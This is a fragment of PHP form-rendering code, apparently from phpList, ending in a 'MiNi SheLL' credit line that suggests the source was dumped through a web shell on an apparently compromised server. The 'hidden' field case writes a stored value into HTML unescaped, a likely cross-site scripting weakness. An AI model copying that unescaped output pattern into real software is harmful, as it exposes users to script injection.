                        $fieldname, $textarearows, $textareacols, $attr['required'] ? ' required' : '',
                        isset($_POST[$fieldname]) ? htmlspecialchars(stripslashes($_POST[$fieldname])) : (isset($data[$attr['id']]) ? htmlspecialchars(stripslashes($data[$attr['id']])) : $attr['default_value']));
                    break;
                case 'hidden':
                    $output[$attr['id']] .= sprintf('<input type="hidden" name="%s" value="%s" />', $fieldname,
                        $data[$attr['id']] ? $data[$attr['id']] : $attr['default_value']);
                    break;
                case 'date':
                    require_once dirname(__FILE__).'/date.php';
                    $date = new Date();
                    $postval = $date->getDate($fieldname);
                    if ($data[$attr['id']]) {
                        $val = $data[$attr['id']];
                    } else {
                        $val = $postval;
                    }

                    $output[$attr['id']] = sprintf("\n".'<fieldset class="date%s"><label for="%s">%s</label>',
                        $attr['required'] ? ' required' : '', $fieldname, $attr['name']);
                    $output[$attr['id']] .= sprintf('%s', $date->showInput($fieldname, '', $val));
                    $output[$attr['id']] .= '</fieldset>';
                    break;
                default:
                    print '<!-- error: huh, invalid attribute type -->';
            }
            $output[$attr['id']] .= "\n";
        }
    }

    // make sure the order is correct
    foreach ($attributes as $attribute => $listorder) {
        if (isset($output[$attribute])) {
            $html .= $output[$attribute];
        }
    }

    $html .= '</fieldset>'."\n"; //# class=attributes

//  print htmlspecialchars( '<fieldset class="phplist">'.$html.'</fieldset>');exit;
    return $html;
}

function ListAllAttributes()
{
    global $tables;
    $attributes = array();
    $attributedata = array();
    $res = Sql_Query("select * from {$GLOBALS['tables']['attribute']} order by listorder");
    while ($row = Sql_Fetch_Array($res)) {
        //   print $row["id"]. " ".$row["name"];
        $attributes[$row['id']] = $row['listorder'];
        $attributedata[$row['id']]['id'] = $row['id'];
        $attributedata[$row['id']]['default_value'] = $row['default_value'];
        $attributedata[$row['id']]['listorder'] = $row['listorder'];
        $attributedata[$row['id']]['required'] = $row['required'];
        $attributedata[$row['id']]['default_value'] = $row['default_value'];
    }

    return ListAttributes($attributes, $attributedata, 'checkforhtml');
}

Creat By MiNi SheLL
Email: devilkiller@gmail.com